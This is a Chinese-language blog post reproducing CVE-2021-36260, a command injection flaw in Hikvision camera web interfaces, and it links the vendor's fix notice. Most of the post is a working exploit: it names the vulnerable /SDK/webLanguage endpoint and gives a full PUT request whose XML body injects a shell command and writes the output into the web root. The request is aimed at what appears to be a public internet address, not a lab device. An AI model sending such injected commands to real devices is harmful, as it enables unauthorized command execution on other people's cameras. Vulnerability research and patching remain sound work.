飞鸟的博客

CVE-2021-36260

 
  • Jun 14, 2023

CVE-2021-36260

海康威视摄像头命令注入

漏洞概述:

海康威视部分产品中的web模块存在一个命令注入漏洞,由于对输入参数校验不充分,攻击者可以发送带有恶意命令的报文到受影响设备,成功利用此漏洞可以导致命令执行。海康威视已发布版本修复该漏洞。

漏洞编号:

CVE-2021-36260

漏洞复现

0x00摄像头版本

在界面中是能够看到有多少年的。正常来说应该在21年的年中之前的摄像头都可能会存在该问题

image

0x01漏洞点

漏洞点位于:/SDK/webLanguage,利用PUT方法上传xml数据

post_data

<?xml version="1.0"
encoding="UTF-8"?><language>$(ifconfig -a >
webLib/dq)</language>

0x02抓包

访问漏洞点

http://178.147.175.88:5357/SDK/webLanguage

image

burp重放

image

更改请求方式为PUT,添加poc数据

PUT /SDK/webLanguage HTTP/1.1
Host: 178.147.175.88:5357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 83

<?xml version="1.0"
encoding="UTF-8"?><language>$(ifconfig > webLib/dq)</language>

image

更换请求路径

该poc会将ifconfig 命令执行的结果保存到dq这个文件中

通过浏览器访问即可查看结果,文件落地默认于webLib/ 也就是web根目录下

http://178.147.175.88:5357/dq

image

也可通过bp进行查看

image

修复

参考官方修复文档:

https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/20210919/
Search